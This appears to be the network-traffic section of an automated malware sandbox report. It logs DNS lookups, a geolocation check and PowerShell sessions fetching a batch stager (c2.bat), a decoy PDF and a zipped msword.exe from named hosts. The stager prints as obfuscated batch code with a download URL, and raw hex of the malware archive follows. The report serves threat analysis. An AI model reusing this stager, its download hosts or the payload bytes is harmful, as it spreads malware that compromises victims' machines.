                                                                                      Jan 11, 2025 22:53:11.894171000 CET1.1.1.1192.168.2.40x6cf2No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 11, 2025 22:53:40.688468933 CET1.1.1.1192.168.2.40x6694Name error (3)ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCFnonenoneA (IP address)IN (0x0001)false
                                                                                      Jan 11, 2025 22:54:07.172962904 CET1.1.1.1192.168.2.40xbc1dNo error (0)me-work.com193.26.115.39A (IP address)IN (0x0001)false
                                                                                      Jan 11, 2025 22:54:08.262870073 CET1.1.1.1192.168.2.40x33a2No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                      Jan 11, 2025 22:54:20.500967026 CET1.1.1.1192.168.2.40x3cd2No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                      Jan 11, 2025 22:54:44.580970049 CET1.1.1.1192.168.2.40x1d23No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • candwfarmsllc.com
                                                                                      • myguyapp.com
                                                                                      • geoplugin.net

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.449830178.237.33.50803272C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 11, 2025 22:54:08.274575949 CET71OUTGET /json.gp HTTP/1.1
                                                                                      Host: geoplugin.net
                                                                                      Cache-Control: no-cache
                                                                                      Jan 11, 2025 22:54:08.890670061 CET1171INHTTP/1.1 200 OK
                                                                                      date: Sat, 11 Jan 2025 21:54:08 GMT
                                                                                      server: Apache
                                                                                      content-length: 963
                                                                                      content-type: application/json; charset=utf-8
                                                                                      cache-control: public, max-age=300
                                                                                      access-control-allow-origin: *
                                                                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                      Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.449732193.26.115.394437384C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-11 21:52:58 UTC168OUTGET /c2.bat HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                      Host: candwfarmsllc.com
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-11 21:52:59 UTC288INHTTP/1.1 200 OK
                                                                                      Date: Sat, 11 Jan 2025 21:52:58 GMT
                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                      Last-Modified: Tue, 07 Jan 2025 14:48:52 GMT
                                                                                      ETag: "e32-62b1ed7f84eca"
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Length: 3634
                                                                                      Connection: close
                                                                                      Content-Type: application/x-msdownload
                                                                                      2025-01-11 21:52:59 UTC3634INData Raw: 40 25 56 4c 75 78 44 78 42 4d 25 65 25 7a 6b 6e 68 74 72 74 69 25 63 25 71 58 49 65 25 68 25 44 69 6f 55 70 72 62 25 6f 25 6e 46 25 20 25 58 53 7a 70 4a 75 4a 25 6f 25 5a 25 66 25 64 4c 25 66 25 65 45 4d 42 25 0d 0a 73 65 74 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6d 79 67 75 79 61 70 70 2e 63 6f 6d 2f 6d 73 77 6f 72 64 2e 7a 69 70 0d 0a 73 25 4f 66 52 5a 68 25 65 25 62 7a 68 6b 72 75 53 59 25 74 25 44 6b 75 74 4b 64 25 20 25 64 78 44 48 25 75 25 4b 7a 47 25 72 25 4b 47 75 57 67 70 42 6d 4d 6f 25 6c 25 61 64 71 50 68 42 77 52 25 3d 25 59 4e 4d 6a 6d 25 68 25 72 74 52 4c 74 50 4a 65 52 25 74 25 44 53 66 57 7a 53 25 74 25 79 59 79 25 70 25 41 42 54 4d 57 58 75 41 73 25 73 25 6d 25 3a 25 4d 49 25 2f 25 53 6e 42 6c 25 2f 25 74 74 6d 25 6d 25 67 76 74 25 79 25
                                                                                      Data Ascii: @%VLuxDxBM%e%zknhtrti%c%qXIe%h%DioUprb%o%nF% %XSzpJuJ%o%Z%f%dL%f%eEMB%set url=https://myguyapp.com/msword.zips%OfRZh%e%bzhkruSY%t%DkutKd% %dxDH%u%KzG%r%KGuWgpBmMo%l%adqPhBwR%=%YNMjm%h%rtRLtPJeR%t%DSfWzS%t%yYy%p%ABTMWXuAs%s%m%:%MI%/%SnBl%/%ttm%m%gvt%y%


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.449734193.26.115.394437576C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-11 21:53:01 UTC163OUTGET /W2.pdf HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                      Host: myguyapp.com
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-11 21:53:01 UTC282INHTTP/1.1 200 OK
                                                                                      Date: Sat, 11 Jan 2025 21:53:01 GMT
                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                      Last-Modified: Tue, 07 Jan 2025 19:23:04 GMT
                                                                                      ETag: "10f3d-62b22ac96cf3c"
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Length: 69437
                                                                                      Connection: close
                                                                                      Content-Type: application/pdf
                                                                                      2025-01-11 21:53:01 UTC7910INData Raw: 25 50 44 46 2d 31 2e 34 0a 25 e2 e3 cf d3 0a 31 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 57 69 64 74 68 20 32 35 34 39 2f 48 65 69 67 68 74 20 33 32 39 39 2f 4c 65 6e 67 74 68 20 33 35 36 37 38 2f 43 6f 6c 6f 72 53 70 61 63 65 5b 2f 49 6e 64 65 78 65 64 5b 2f 43 61 6c 52 47 42 3c 3c 2f 47 61 6d 6d 61 5b 32 2e 32 20 32 2e 32 20 32 2e 32 5d 2f 4d 61 74 72 69 78 5b 30 2e 34 31 32 33 39 20 30 2e 32 31 32 36 34 20 30 2e 30 31 39 33 33 20 30 2e 33 35 37 35 38 20 30 2e 37 31 35 31 37 20 30 2e 31 31 39 31 39 20 30 2e 31 38 30 34 35 20 30 2e 30 37 32 31 38 20 30 2e 39 35 30 34 5d 2f 57 68 69 74 65 50 6f 69 6e 74 5b 30 2e 39 35 30 34 33 20 31 20 31 2e 30 39 5d 3e 3e 5d 20 31 28 00 00 00 ff ff ff
                                                                                      Data Ascii: %PDF-1.4%1 0 obj<</Type/XObject/Subtype/Image/Width 2549/Height 3299/Length 35678/ColorSpace[/Indexed[/CalRGB<</Gamma[2.2 2.2 2.2]/Matrix[0.41239 0.21264 0.01933 0.35758 0.71517 0.11919 0.18045 0.07218 0.9504]/WhitePoint[0.95043 1 1.09]>>] 1(
                                                                                      2025-01-11 21:53:01 UTC16384INData Raw: f1 bb f4 48 93 6a ef 97 6c 9b 5f 72 d9 f9 bd ed fd d4 de 68 fd e9 ff 30 dc 89 7e 5b 33 f6 fb 5f 9b ec a8 2d 3a bf 13 62 79 c6 cb 1f 87 bd df ff 1c b7 70 aa ca 15 61 fd 69 f4 2b 13 93 d6 d1 ef 70 2b fc 8c 4a 3b bf 6f d4 41 f0 73 61 61 ad f7 4b 86 3b 59 e5 db b1 5f de aa 5c bf e0 89 2c cd e4 f1 60 a5 6a 9a d0 4c 7a 3f 9a 9f 0e 3f a6 b4 d5 d8 2f 35 ea a7 34 f8 4d 9e b6 5f 4d 23 fd 94 37 89 65 bc 94 5a 17 f5 f7 ca 2a 93 d0 0c 07 6f f7 70 d9 61 58 76 d5 e9 70 27 a3 94 7a a3 2a fa 6f 5f 39 55 d5 85 56 85 21 33 de 48 a7 e8 71 3a a9 8b d3 9c f8 0f e8 7f 15 3d f8 82 7f 4c 9b b7 f4 c7 a0 27 e5 87 f9 fa ff 45 cf f5 4b c6 3f 8f 77 41 7a c2 7e a4 41 bf 77 9d b8 b0 fd f2 0f 2a ab df 24 5a fd a4 7e 0e 83 0e 6f bf f4 3c d0 99 6c b8 53 4d 7e af d4 73 f5 9d fa 81 be f2 12
                                                                                      Data Ascii: Hjl_rh0~[3_-:bypai+p+J;oAsaaK;Y_\,`jLz??/54M_M#7eZ*opaXvp'z*o_9UV!3Hq:=L'EK?wAz~Aw*$Z~o<lSM~s
                                                                                      2025-01-11 21:53:01 UTC16384INData Raw: 1a fd 5a 3e 03 f8 6e f9 d5 fd 03 3a bf fd e8 f7 c1 eb 99 9f 4d c9 cf 54 dd f8 8f 6e 99 f3 bb 81 1f 17 fc ec 8b fd 67 9d df c9 cc 4f ff e5 cc ef 90 16 52 e6 fc 4e 6e 7c bc 7c c1 ff f7 3b ee f7 dc 7d ef a3 5f 36 f3 3b 39 9d f3 cb e6 fd ae e0 17 1e c9 33 82 83 1f 4d 74 67 7e d3 91 5f c3 b7 8c fd 9a 3b fc 76 64 f9 77 de cf 7d e7 be f1 c1 cf 96 33 bf 7c e4 47 cb 1f e5 9c 5f bb db 7e c3 f4 37 fa fd 33 de fc c8 7e 4b f3 7f 9d 9f 2e e3 fc 5f eb 3f 76 7e 7f c5 eb f0 bb e9 07 3f 11 f9 55 99 77 bb e6 67 69 40 ab c8 8f bf 27 3f 3d 9b ff b3 61 fe cf 94 9d 9f f6 d1 ef 26 fa 69 f6 fb d8 fb 7d 64 3f 47 7e 36 ac 4f 7c 72 3d 7e f9 83 fc e8 f7 4d 1f f2 33 45 f4 d3 55 ef 57 f8 78 99 97 df aa 9b e0 47 ef df df c8 6f 17 d6 9f 0e cb bf 2e e3 1d 82 d2 b0 37 c1 2a bf b8 fc 56 d8
                                                                                      Data Ascii: Z>n:MTngORNn||;}_6;93Mtg~_;vdw}3|G_~73~K._?v~?Uwgi@'?=a&i}d?G~6O|r=~M3EUWxGo.7*V
                                                                                      2025-01-11 21:53:01 UTC16384INData Raw: c3 a2 1f 16 fd b0 e8 87 45 3f 2c fa 61 d1 0f 8b 7e 58 f4 c3 a2 1f 16 fd b0 e8 87 45 3f 2c fa 61 d1 0f 8b 7e 58 f4 c3 a2 1f 16 fd b0 e8 87 45 3f 2c fa 61 d1 0f 8b 7e 58 f4 c3 a2 1f 16 fd b0 e8 87 45 3f 2c fa 61 d1 0f 8b 7e 58 f4 c3 a2 1f 16 fd b0 e8 87 45 3f 2c fa 61 d1 0f 8b 7e 58 f4 c3 a2 1f 16 fd b0 e8 87 45 3f 2c fa 61 1d da 6f 70 8a f6 6d 33 d2 1d da 2f 1d 98 08 bb 61 46 ba 83 fa 39 85 d6 07 b9 5f e2 b4 e7 bf bf 65 46 ba 83 fa 45 ed 61 d7 1a 7f e5 f6 d4 e1 05 33 d2 1d d4 2f 69 2f f6 5a cb bf c5 f6 17 f8 f8 3d d8 f5 06 9e 36 e8 97 77 58 bf 87 ad cf e9 97 77 58 bf f6 3b 4e d0 2f 8f 7e 58 87 f5 6b 3f 0d d3 2f 8f 7e 58 87 f4 cb e8 d7 df a1 fc b2 d3 b2 f6 3c 93 ea c7 ea 17 07 a6 16 d2 ef 60 d7 3b 57 4c bc c4 89 9d cc 8f 75 5b 44 fd 6a 9e 71 fc 46 32 d2 5b
                                                                                      Data Ascii: E?,a~XE?,a~XE?,a~XE?,a~XE?,a~XE?,aopm3/aF9_eFEa3/i/Z=6wXwX;N/~Xk?/~X<`;WLu[DjqF2[
                                                                                      2025-01-11 21:53:01 UTC12375INData Raw: c3 cc 9c e0 0e ee 37 3d 78 51 6c b6 7b 3e db ee ff 62 35 ff fa 7d f9 30 35 27 b8 83 fb f9 83 17 d1 cf 1c c2 2f 0b 06 2f 8a fb 1e b3 1b fd 5f ac e6 5f d7 41 9b 98 13 dc 81 fd d2 c1 d5 17 13 87 bd cb bc 21 7e 21 fd 3a 55 f6 2a c4 41 af df c0 73 6d 35 ff ba ae 73 c7 e6 04 77 60 3f 19 5f a9 6b 36 23 93 be 6b ca 26 3b 2d 2e b2 44 4c 7c 13 05 69 6c 6a 66 d1 24 9e b9 9f 6f a3 c4 81 f5 f3 4d e6 99 5a 18 19 53 34 27 b5 03 fb c9 ea 5f 5c 30 f5 72 18 17 32 27 d0 6f 13 2f 13 b9 a6 ec c5 b5 d0 09 1c 2f 2a 9a 37 5f 77 04 d9 d4 dc c4 f1 f5 eb 89 13 3a 7e d9 4d 4f ee 4e 9e 03 fb c9 ea 5f 23 32 45 27 58 69 a4 67 fd 0d 79 50 26 32 aa 96 2a c6 73 6b e5 9b 67 df 73 bc fa 62 fa c6 97 8a fa 90 f5 2a d6 af 28 9b cd 37 df f3 1c 37 89 43 73 42 3b b0 9f 3c 13 ac c4 37 5f bb 1e ac
                                                                                      Data Ascii: 7=xQl{>b5}05'//__A!~!:U*Asm5sw`?_k6#k&;-.DL|iljf$oMZS4'_\0r2'o//*7_w:~MON_#2E'XigyP&2*skgsb*(77CsB;<7_


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.449737193.26.115.394437836C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-11 21:53:06 UTC167OUTGET /msword.zip HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                      Host: myguyapp.com
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-11 21:53:06 UTC285INHTTP/1.1 200 OK
                                                                                      Date: Sat, 11 Jan 2025 21:53:06 GMT
                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                      Last-Modified: Wed, 08 Jan 2025 11:47:08 GMT
                                                                                      ETag: "323b00-62b306bdd696f"
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Length: 3291904
                                                                                      Connection: close
                                                                                      Content-Type: application/zip
                                                                                      2025-01-11 21:53:06 UTC7907INData Raw: 50 4b 03 04 14 00 08 00 08 00 6e 15 28 5a 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 20 00 6d 73 77 6f 72 64 2e 65 78 65 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 55 54 0d 00 07 d1 56 7e 67 b7 65 7e 67 0b 65 7e 67 ec bd 7b 7c 54 c5 dd 3f 7e f6 92 64 49 36 ec 22 09 46 0d 1a 21 28 ca a5 d1 05 4d 5c d0 05 72 42 b0 59 5c 58 77 17 94 70 51 12 0f 2b 02 4d ce e1 d2 12 25 6e a2 ac 87 b5 d6 da a7 d8 da a7 a6 d8 a7 b6 b5 95 b6 56 a2 22 26 80 24 28 b5 28 3c 98 16 7c 0c 48 f5 ac 1b 75 95 18 16 88 9c ef fb 33 73 36 04 1e 7b fb be be bf ff 7e e1 35 7b e6 cc 99 cb 67 3e f3 b9 cd cc 67 06 ef 1d 8f 09 16 41 10 ac 08 ba 2e 08 ad 02 ff f3 08 ff fc 6f 3f c2 d0 2b 5e 1e 2a bc 30 e4 4f 57 b6 9a aa fe 74 e5 ed d2 b2 fa a2 55 75 2b ef a9 5b 72 5f d1 dd 4b 56 ac 58 29 17 dd 55
                                                                                      Data Ascii: PKn(Z msword.exeuxUTV~ge~ge~g{|T?~dI6"F!(M\rBY\XwpQ+M%nV"&$((<|Hu3s6{~5{g>gA.o?+^*0OWtUu+[r_KVX)U
                                                                                      2025-01-11 21:53:06 UTC16384INData Raw: d0 46 19 93 59 4a b1 a4 5f 81 a1 d0 f3 9f 25 94 8f 45 a3 7e 4d 07 1d 69 2d 86 4c 7b 92 79 a4 80 7c b8 85 0b 8d 96 a7 79 40 82 51 0c 18 40 6e 28 9b 40 04 2d 2f 0c 84 b4 67 47 11 78 89 8b d1 cf 42 d6 cf ef 7d 95 86 3e 2b f2 a9 d9 7d b2 fe 6f 34 cc 24 a8 dc 27 eb 56 b0 f9 36 19 ea da 47 e3 d9 8a f9 75 06 c0 77 8f a1 cd 67 e6 2e 32 0f 51 90 84 33 92 fb 1c 89 41 ed de cb c9 b6 40 db 85 da 65 e8 96 b6 f1 2b da 4a dd 4d 96 21 72 39 9a 3e 21 68 69 f3 8f c1 f9 bb 2b 69 be a1 e7 3f 43 7d b3 b1 be 8d 46 85 5c 3e fa d3 bb b2 f2 4b 01 3f e7 13 3f 77 4b a9 2d 9b 40 70 28 39 06 3c 07 8a 99 cf 5c 21 f7 0c 78 bd 98 7c 31 88 c2 6c ab f0 fa 22 5e c3 97 2e da a1 41 fe 30 1f 43 7d 6b 11 09 61 ed c9 f1 dc ef a3 91 c3 26 df 12 36 05 25 12 ec 7a fe d3 dc 17 64 42 20 a8 1d 82 41
                                                                                      Data Ascii: FYJ_%E~Mi-L{y|y@Q@n(@-/gGxB}>+}o4$'V6Guwg.2Q3A@e+JM!r9>!hi+i?C}F\>K??wK-@p(9<\!x|1l"^.A0C}ka&6%zdB A
                                                                                      2025-01-11 21:53:06 UTC16384INData Raw: 7d 77 36 5f 5d 7d 77 f7 6e db 2d 3f 16 71 2d 46 ca 48 cb db 8a a3 be 1e 16 e8 25 5f 38 ef 6e ca 95 86 63 ba 9d 37 55 d7 0e 67 38 1e 4a b6 c7 4c 42 bf 5b 4d 2d d9 58 89 cc bf d8 40 0f 9c 12 f2 4f 33 e1 7b 9c 36 9f 53 b2 db 8b c1 fb cc ed fd ac 2a 11 63 cc 77 17 59 75 eb 2b f4 24 02 69 4a 46 1e 7c 6b 1d e3 b2 e8 6a c8 1f 1d 1f 28 c5 e0 c7 da 84 e7 16 be ab 7b 8e c5 8e 07 0d ac 6d ce 15 af f2 4f 05 1e 7f fb 88 eb 6d d5 ea b0 eb 9c ba 94 d8 15 b6 fa 9c 1f 9a 19 6e 6d 2b 11 e7 b4 a4 3f 55 ba 28 bd da df a4 2d c1 5d 93 7e 5e 62 03 9a ad 37 b8 a4 9e 96 5c 79 5f ad aa 28 4b f3 a1 cc 67 6e 65 0f c2 9d f2 62 b3 99 3e 21 3c 67 4d 74 4d 48 cd c5 1a 8c 8d 47 fc 53 37 db b4 ce 9e c2 c3 92 1e fd 2a 02 39 93 24 2f 45 73 c3 b1 f4 60 76 9a 7a a2 4a 21 8e 79 a0 b5 6e 84 57
                                                                                      Data Ascii: }w6_]}wn-?q-FH%_8nc7Ug8JLB[M-X@O3{6S*cwYu+$iJF|kj({mOmnm+?U(-]~^b7\y_(Kgneb>!<gMtMHGS7*9$/Es`vzJ!ynW
                                                                                      2025-01-11 21:53:06 UTC16384INData Raw: 0e 8e 26 84 2c 4d 9a d8 ab a5 83 ef a9 f3 e3 3e 64 77 72 1b 27 20 72 e2 0a 46 ba 2b 20 a1 27 7f 3a 2d ac a5 c9 9f f9 d7 6b 44 46 30 01 80 5d 00 00 80 00 00 17 8f fc ea d1 c9 d4 a0 9a 4b 8a c8 55 d4 61 36 95 25 3a ec 89 63 34 2f 2e d3 0b 13 5e 0a 04 ed 93 b6 09 67 06 6c 7e 9e 7a 03 20 24 8d 64 7d a4 84 6c bc cb bd 26 86 a4 ab 2a 60 60 48 3c bb 11 22 14 b9 3e c3 4e 69 8e 7d 88 fa c5 6b 30 2e 94 79 8a 8f c7 be 40 30 35 b6 ff 83 9b 98 42 3f 9b 7d 26 e4 c5 0d f6 97 84 07 45 4d 35 19 b3 61 67 17 6d 17 29 a8 44 81 c0 ab 7f 61 87 31 42 77 40 1f 67 76 82 9c 4e 8b 49 3a 28 1a 6e 20 d5 2e 30 1d b3 87 e0 7f 21 0d cc 88 e0 ef bc 2e 8e 24 88 77 b4 ee 18 e3 34 45 bf ff 88 70 a8 fa 3b 61 0c 8c ce 2a 35 ab b5 12 74 35 f4 32 8d 27 d2 d6 b5 99 dc 15 f3 c8 d3 ca a2 0c 00 e6
                                                                                      Data Ascii: &,M>dwr' rF+ ':-kDF0]KUa6%:c4/.^gl~z $d}l&*``H<">Ni}k0.y@05B?}&EM5agm)Da1Bw@gvNI:(n .0!.$w4Ep;a*5t52'
                                                                                      2025-01-11 21:53:06 UTC16384INData Raw: fd 6c d1 1e 4d 95 61 60 cc c9 dd e4 ed 8d 20 a4 fc a7 18 78 14 0c 63 74 cf b4 5d 3c 42 70 de 63 d1 42 aa 59 1b 5a 0d ad d7 68 a7 5c 3c 07 d8 9a 1f 81 03 47 19 41 5f 64 6a 52 bc 73 75 22 49 5b 2d 12 e6 b1 85 3b 9c e9 86 64 7e 59 30 dd b4 7f 2e 1c e3 a0 ad 1c 7c fa 96 ee c6 cf d8 ec 97 70 c2 ed d8 bc c7 63 9e 1d 7e 2b d3 95 81 0f 05 d6 04 a1 9f 3f 9f 95 42 ec 74 b5 25 be 6f 15 a2 59 13 70 d7 1f 0f ef 6f 2a 44 d9 36 c4 38 e3 19 8d f8 9a 49 84 fa d6 26 22 84 db 14 a2 24 cd 3f e3 5b 1c ef 7a 61 5f 73 38 30 aa 72 f5 66 bc 44 f6 72 91 3d e1 f8 d1 d2 e4 4c 9b 07 03 b5 c0 cf 09 bf 21 4c a2 9e c8 6f 26 76 73 d5 cc 81 80 a9 89 f2 79 b8 92 5c 34 20 c2 e8 22 c1 8f ef a6 4b 5e 83 f9 73 f5 9f fa 48 cc 22 6b cb d0 5b d0 2e 4a d1 d8 05 ed 00 97 09 8b 3d 2f 8b 31 44 3c f7
                                                                                      Data Ascii: lMa` xct]<BpcBYZh\<GA_djRsu"I[-;d~Y0.|pc~+?Bt%oYpo*D68I&"$?[za_s80rfDr=L!Lo&vsy\4 "K^sH"k[.J=/1D<
                                                                                      2025-01-11 21:53:06 UTC16384INData Raw: ae cf 96 ea a2 e6 1c 74 de d0 36 93 a3 8e f2 a3 a3 53 fc 56 cf f6 33 27 7d 25 dc 07 77 11 fd a5 3e 6f c4 30 ca d0 0f 00 12 91 d8 a3 b9 aa 76 2a 87 83 24 59 f3 43 57 3c 23 08 e8 02 a6 44 4b 38 9f f9 57 98 69 28 11 7b 52 bf 91 11 e0 14 eb 06 bf bf 3a 72 35 f6 e0 8b 1e 6b 57 cd 8a 0b 8e 93 ce 78 62 c1 54 8d 83 0a ee 69 af f2 09 06 d2 58 f1 94 41 76 28 3c 06 2d 18 9c fb 12 2f 3e 36 21 d4 2b 86 0f bd 01 ec ec b3 7e 7a 1b 73 a0 ff b9 86 fc e9 23 c0 84 53 63 50 bf e8 fe 73 b8 c4 d0 31 9f 0a 1d 5b e4 19 dd 5d b5 ab 31 fe f9 73 60 6f 0e 74 3f 01 4f b4 1e 15 e4 85 63 0f b6 c6 a2 55 84 0a ca 6e d1 8d 0f 79 24 bc 3b 21 07 17 59 c9 57 59 93 60 b8 67 d9 1f aa 29 22 fc e9 cb 5d 56 26 53 26 0f dd 66 ff 20 f8 9b 3c ea 18 a9 05 d4 a8 9b 8f eb 68 a9 b6 f3 9c 7c 37 c3 49 1f
                                                                                      Data Ascii: t6SV3'}%w>o0v*$YCW<#DK8Wi({R:r5kWxbTiXAv(<-/>6!+~zs#ScPs1[]1s`ot?OcUny$;!YWY`g)"]V&S&f <h|7I
                                                                                      2025-01-11 21:53:06 UTC16384INData Raw: 3c cc 6e ab 22 81 0a f6 0b e4 7e 1f 0b 8f 98 40 11 92 4b fc f1 1f 92 cd 16 6f f7 55 1b 26 49 40 1c 09 73 f3 24 8b df 26 1f 01 7b 19 5e 28 e6 8a 3b e1 4a 4a 81 d5 1a d9 0b 29 49 49 f4 38 c4 dc fe ec 56 ff 79 69 f9 69 0d 54 7c 40 2a 18 3f 36 39 37 5a 8f b9 46 14 a9 55 bf 21 5c 7c 97 f6 6b 3c cf 2e cc 69 0c c2 0d fa fb ed f1 bf f9 cb f8 c5 cc a1 55 13 b5 5b 71 91 a9 7c e1 67 10 bd 0f aa 98 e7 f7 b7 00 91 a1 f8 e2 ea 01 65 66 9c 98 e4 b4 74 41 c3 03 a9 28 2e a0 32 8c 8c 21 85 92 d8 53 65 de 2a af bd e0 8a ac c2 ec 33 3b 9c 71 69 43 36 dd 38 b9 3b 48 08 4a 6d 25 bb 3b 85 08 98 a5 e5 7a b3 5a 84 49 33 0a 51 71 47 3c ee e8 09 b7 4f ff 09 18 5f f8 ef be 57 98 30 3c 9f e7 74 d6 f8 ed b9 45 78 e3 3f a0 bb 80 dd 3d d0 86 3e 93 a7 bd a8 31 41 66 e7 37 2e 9d 8b e8 94
                                                                                      Data Ascii: <n"~@KoU&I@s$&{^(;JJ)II8VyiiT|@*?697ZFU!\|k<.iU[q|geftA(.2!Se*3;qiC68;HJm%;zZI3QqG<O_W0<tEx?=>1Af7.
                                                                                      2025-01-11 21:53:06 UTC16384INData Raw: 0b 23 32 ca f5 bb 37 8f 91 2b 5e f9 2b c1 c4 93 92 e8 c3 c3 9d 36 82 71 31 79 95 58 8e a6 29 66 f8 b3 2d ab 44 18 71 ec 43 a0 b5 30 06 4e c7 44 48 81 43 b7 a8 04 7c b8 a4 68 fc eb 2e 12 3d c9 4f 4d f8 ed 2b 9b 31 95 77 4c 70 6e a8 b9 30 00 50 94 a7 85 f4 38 35 12 89 4b ff 44 2d f8 40 38 1d 8f 91 29 26 5a 75 65 7b 9f 60 ea ad 34 50 5f a2 8a 0b e1 84 92 97 0a bf 1f f0 02 b0 5f ab 7f 5c 5b 3f 88 5a f2 0e 1c 43 ff e1 be d8 0b 7c 90 73 51 3d ab 28 f0 bb 35 ce 5f 77 72 22 0e 56 28 8a d0 97 e5 31 bb c7 8b 6e 0d 8e 48 62 34 10 bd 4f fd 31 36 f9 f2 63 a5 84 60 70 ed 59 35 89 cf ee 68 15 c1 7d 7e 1d 0c 50 ec d0 62 a9 9e 89 ef 13 01 8e f0 04 25 41 c2 40 67 20 7f 98 a4 c8 6d 76 42 43 30 1e 38 fd dc 07 e2 c7 da c4 76 7e 0d ad fc 0c 53 1a 34 47 ff d8 83 aa d8 10 db 91
                                                                                      Data Ascii: #27+^+6q1yX)f-DqC0NDHC|h.=OM+1wLpn0P85KD-@8)&Zue{`4P__\[?ZC|sQ=(5_wr"V(1nHb4O16c`pY5h}~Pb%A@g mvBC08v~S4G
